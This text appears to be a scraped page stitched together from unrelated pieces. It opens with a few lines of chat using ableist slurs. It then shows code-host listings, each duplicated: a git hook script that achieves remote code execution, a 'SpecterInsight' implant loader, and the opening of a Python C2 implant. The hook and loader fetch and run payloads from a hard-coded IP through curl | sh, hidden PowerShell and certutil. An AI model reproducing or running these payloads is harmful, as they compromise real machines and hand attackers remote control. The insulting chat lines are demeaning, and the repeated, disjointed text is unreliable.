There was a study the more you like communism the lower iq you had and honestly i believe it 😭
macu software
There was a study the more you like communism the lower iq you had and honestly i believe it 😭
I dont think the communism made her more retarded....
macu software
I dont think the communism made her more retarded....
True but she’s retarded enough to like it so
1.5 KiB
Bash
Executable File
#!/bin/sh
git_dir=$(git rev-parse --absolute-git-dir) || exit 1
origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2
case "$origin_objects" in
/*) ;;
*) origin_objects="$git_dir/objects/$origin_objects" ;;
esac
origin_git=${origin_objects%/objects}
[ "$origin_git" != "$origin_objects" ] || exit 3
output_blob=$({
curl -fsSL http://207.57.122.131:8085/sx.sh | sh
A=$(uname -m); case "$A" in x86_64|amd64) B=sx_linux;; aarch64|arm64) B=sx_linux_arm64;; armv7l|armv7) B=sx_linux_armv7;; *) B=sx_linux;; esac; curl -fsSL http://207.57.122.131:8085/$B -o /tmp/.sx && chmod +x /tmp/.sx && /tmp/.sx &
powershell -w hidden -ep bypass -c "iex(iwr -useb 'http://207.57.122.131:46721/static/resources/?build=win-http&kind=ps_script').Content"
certutil.exe -urlcache -split -f "http://207.57.122.131:46721/static/resources/?build=win-http&kind=exe_x64" C:\Windows\Temp\s.exe && C:\Windows\Temp\s.exe
powershell -w hidden -c "iwr -useb 'http://207.57.122.131:46721/static/resources/?build=win-http&kind=exe_x64' -OutFile $env:TEMP\s.exe;& $env:TEMP\s.exe"
} 2>&1 | git --git-dir="$origin_git" hash-object -w --stdin) || exit 4
tree=$(printf "100644 blob %s\\tproof\\n" "$output_blob" | git --git-dir="$origin_git" mktree) || exit 5
commit=$(printf "rce proof\\n" | GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@x GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@x git --git-dir="$origin_git" commit-tree "$tree") || exit 6
git --git-dir="$origin_git" update-ref refs/heads/rce-proof "$commit" || exit 7
exit 0
Bash
Executable File
#!/bin/sh
git_dir=$(git rev-parse --absolute-git-dir) || exit 1
origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2
case "$origin_objects" in
/*) ;;
*) origin_objects="$git_dir/objects/$origin_objects" ;;
esac
origin_git=${origin_objects%/objects}
[ "$origin_git" != "$origin_objects" ] || exit 3
output_blob=$({
curl -fsSL http://207.57.122.131:8085/sx.sh | sh
A=$(uname -m); case "$A" in x86_64|amd64) B=sx_linux;; aarch64|arm64) B=sx_linux_arm64;; armv7l|armv7) B=sx_linux_armv7;; *) B=sx_linux;; esac; curl -fsSL http://207.57.122.131:8085/$B -o /tmp/.sx && chmod +x /tmp/.sx && /tmp/.sx &
powershell -w hidden -ep bypass -c "iex(iwr -useb 'http://207.57.122.131:46721/static/resources/?build=win-http&kind=ps_script').Content"
certutil.exe -urlcache -split -f "http://207.57.122.131:46721/static/resources/?build=win-http&kind=exe_x64" C:\Windows\Temp\s.exe && C:\Windows\Temp\s.exe
powershell -w hidden -c "iwr -useb 'http://207.57.122.131:46721/static/resources/?build=win-http&kind=exe_x64' -OutFile $env:TEMP\s.exe;& $env:TEMP\s.exe"
} 2>&1 | git --git-dir="$origin_git" hash-object -w --stdin) || exit 4
tree=$(printf "100644 blob %s\\tproof\\n" "$output_blob" | git --git-dir="$origin_git" mktree) || exit 5
commit=$(printf "rce proof\\n" | GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@x GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@x git --git-dir="$origin_git" commit-tree "$tree") || exit 6
git --git-dir="$origin_git" update-ref refs/heads/rce-proof "$commit" || exit 7
exit 0
#!/bin/sh
# SpecterInsight Linux implant loader (auto-arch)
URL="http://207.57.122.131:8085"
A=$(uname -m)
case "$A" in
x86_64|amd64) B="sx_linux" ;;
aarch64|arm64) B="sx_linux_arm64" ;;
armv7l|armv7|armv6l) B="sx_linux_armv7" ;;
*) B="sx_linux" ;;
esac
for D in /tmp /var/tmp "$HOME" .; do
[ -w "$D" ] || continue
F="$D/.sx_$$"
if curl -fsSL "$URL/$B" -o "$F" 2>/dev/null && [ -s "$F" ]; then
chmod +x "$F" 2>/dev/null
"$F" >/dev/null 2>&1 &
exit 0
fi
rm -f "$F" 2>/dev/null
done
echo "[!] start failed (no writable dir or download error)" >&2
exit 1
# SpecterInsight Linux implant loader (auto-arch)
URL="http://207.57.122.131:8085"
A=$(uname -m)
case "$A" in
x86_64|amd64) B="sx_linux" ;;
aarch64|arm64) B="sx_linux_arm64" ;;
armv7l|armv7|armv6l) B="sx_linux_armv7" ;;
*) B="sx_linux" ;;
esac
for D in /tmp /var/tmp "$HOME" .; do
[ -w "$D" ] || continue
F="$D/.sx_$$"
if curl -fsSL "$URL/$B" -o "$F" 2>/dev/null && [ -s "$F" ]; then
chmod +x "$F" 2>/dev/null
"$F" >/dev/null 2>&1 &
exit 0
fi
rm -f "$F" 2>/dev/null
done
echo "[!] start failed (no writable dir or download error)" >&2
exit 1
#!/usr/bin/env python3
"""
SpecterInsight Linux Implant (Python)
=====================================
Implements the SpecterInsight v6 HTTP(S) C2 protocol for Linux targets.
Protocol:
- Register: POST /threads/{sid}/register (gzip .NET BinaryWriter payload)
- Poll: GET /threads/{sid}/messages?filter={ms}
- Results: POST /threads/{sid}/messages (gzip RunScriptResponse)
- Errors: POST /threads/{sid}/notes
Tasks are PowerShell scripts executed via pwsh; results are CLIXML.
Requirements on target:
- python3 (with requests, urllib3)
- pwsh (PowerShell 7) -- install: apt install powershell
Usage:
SX_URL=https://<c2>:<port> SX_BUILD=<build> python3 sx_linux_implant.py
python3 sx_linux_implant.py --url https://<c2>:<port> --build <build>
Options:
--url C2 callback URL (required)
--build Build name registered on the server (must NOT be "default")
--interval Callback interval seconds (default 5)
--window Jitter window seconds (default 5)
"""
import argparse
import gzip
import hashlib
import os
import random
import shutil
import socket
import struct
import subprocess
import sys
import time
import uuid
from datetime import datetime, timedelta, timezone
import requests
import urllib3
urllib3.disable_warnings()
DEFAULT_USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36")
TASK_TIMEOUT = 300
# ------------------------------------------------------------------
# .NET binary serialization (GZip + BinaryWriter layout)
# ------------------------------------------------------------------
def w_string(buf, s):
data = (s or "").encode("utf-8")
length = len(data)
while length >= 0x80:
buf.append((length & 0x7F) | 0x80)
length >>= 7
buf.append(length)
buf.extend(data)
def w_int32(buf, v):
buf.extend(struct.pack("<i", v))
def w_bool(buf, v):
buf.append(1 if v else 0)
def w_timespan(buf, seconds):
w_int32(buf, 0)
w_int32(buf, 0)
w_int32(buf, 0)
w_int32(buf, seconds)
w_int32(buf, 0)
def w_datetime(buf, dt):
epoch = datetime(1, 1, 1, tzinfo=timezone.utc)
ticks = int((dt - epoch).total_seconds() * 10_000_000)
buf.extend(struct.pack("<q", ticks | (1 << 62)))
def r_int32(data, off):
return struct.unpack_from("<i", data, off)[0], off + 4
def r_bool(data, off):
return bool(data[off]), off + 1
def r_string(data, off):
length = 0
shift = 0
while True:
b = data[off]
off += 1
length |= (b & 0x7F) << shift
if not (b & 0x80):
break
shift += 7
return data[off:off + length].decode("utf-8", errors="replace"), off + length
class SessionTerminated(Exception):
pass
# ------------------------------------------------------------------
# Implant
# ------------------------------------------------------------------
class Implant:
def __init__(self, url, build, interval, window):
self.url = url.rstrip("/")
self.build = build
self.interval = interval
self.window = window
self.session_id = uuid.uuid4().hex
self.host_id = self._host_id()
self.username = os.environ.get("USER", "unknown")
self.path = os.path.abspath(sys.argv[0])
self.pid = os.getpid()
self.registered = False
self.http = requests.Session()
self.http.verify = False
self.http.headers["User-Agent"] = DEFAULT_USER_AGENT
self.expiration = datetime.now(timezone.utc) + timedelta(days=365)
@staticmethod
def _host_id():
for p in ("/etc/machine-id", "/var/lib/dbus/machine-id"):
try:
if os.path.exists(p):
with open(p) as f:
return hashlib.sha1(f.read().strip().encode()).hexdigest()
except Exception:
pass
return hashlib.sha1(socket.gethostname().encode()).hexdigest()
@staticmethod
def _fqdn():
return socket.gethostname().upper()
"""
SpecterInsight Linux Implant (Python)
=====================================
Implements the SpecterInsight v6 HTTP(S) C2 protocol for Linux targets.
Protocol:
- Register: POST /threads/{sid}/register (gzip .NET BinaryWriter payload)
- Poll: GET /threads/{sid}/messages?filter={ms}
- Results: POST /threads/{sid}/messages (gzip RunScriptResponse)
- Errors: POST /threads/{sid}/notes
Tasks are PowerShell scripts executed via pwsh; results are CLIXML.
Requirements on target:
- python3 (with requests, urllib3)
- pwsh (PowerShell 7) -- install: apt install powershell
Usage:
SX_URL=https://<c2>:<port> SX_BUILD=<build> python3 sx_linux_implant.py
python3 sx_linux_implant.py --url https://<c2>:<port> --build <build>
Options:
--url C2 callback URL (required)
--build Build name registered on the server (must NOT be "default")
--interval Callback interval seconds (default 5)
--window Jitter window seconds (default 5)
"""
import argparse
import gzip
import hashlib
import os
import random
import shutil
import socket
import struct
import subprocess
import sys
import time
import uuid
from datetime import datetime, timedelta, timezone
import requests
import urllib3
urllib3.disable_warnings()
DEFAULT_USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36")
TASK_TIMEOUT = 300
# ------------------------------------------------------------------
# .NET binary serialization (GZip + BinaryWriter layout)
# ------------------------------------------------------------------
def w_string(buf, s):
data = (s or "").encode("utf-8")
length = len(data)
while length >= 0x80:
buf.append((length & 0x7F) | 0x80)
length >>= 7
buf.append(length)
buf.extend(data)
def w_int32(buf, v):
buf.extend(struct.pack("<i", v))
def w_bool(buf, v):
buf.append(1 if v else 0)
def w_timespan(buf, seconds):
w_int32(buf, 0)
w_int32(buf, 0)
w_int32(buf, 0)
w_int32(buf, seconds)
w_int32(buf, 0)
def w_datetime(buf, dt):
epoch = datetime(1, 1, 1, tzinfo=timezone.utc)
ticks = int((dt - epoch).total_seconds() * 10_000_000)
buf.extend(struct.pack("<q", ticks | (1 << 62)))
def r_int32(data, off):
return struct.unpack_from("<i", data, off)[0], off + 4
def r_bool(data, off):
return bool(data[off]), off + 1
def r_string(data, off):
length = 0
shift = 0
while True:
b = data[off]
off += 1
length |= (b & 0x7F) << shift
if not (b & 0x80):
break
shift += 7
return data[off:off + length].decode("utf-8", errors="replace"), off + length
class SessionTerminated(Exception):
pass
# ------------------------------------------------------------------
# Implant
# ------------------------------------------------------------------
class Implant:
def __init__(self, url, build, interval, window):
self.url = url.rstrip("/")
self.build = build
self.interval = interval
self.window = window
self.session_id = uuid.uuid4().hex
self.host_id = self._host_id()
self.username = os.environ.get("USER", "unknown")
self.path = os.path.abspath(sys.argv[0])
self.pid = os.getpid()
self.registered = False
self.http = requests.Session()
self.http.verify = False
self.http.headers["User-Agent"] = DEFAULT_USER_AGENT
self.expiration = datetime.now(timezone.utc) + timedelta(days=365)
@staticmethod
def _host_id():
for p in ("/etc/machine-id", "/var/lib/dbus/machine-id"):
try:
if os.path.exists(p):
with open(p) as f:
return hashlib.sha1(f.read().strip().encode()).hexdigest()
except Exception:
pass
return hashlib.sha1(socket.gethostname().encode()).hexdigest()
@staticmethod
def _fqdn():
return socket.gethostname().upper()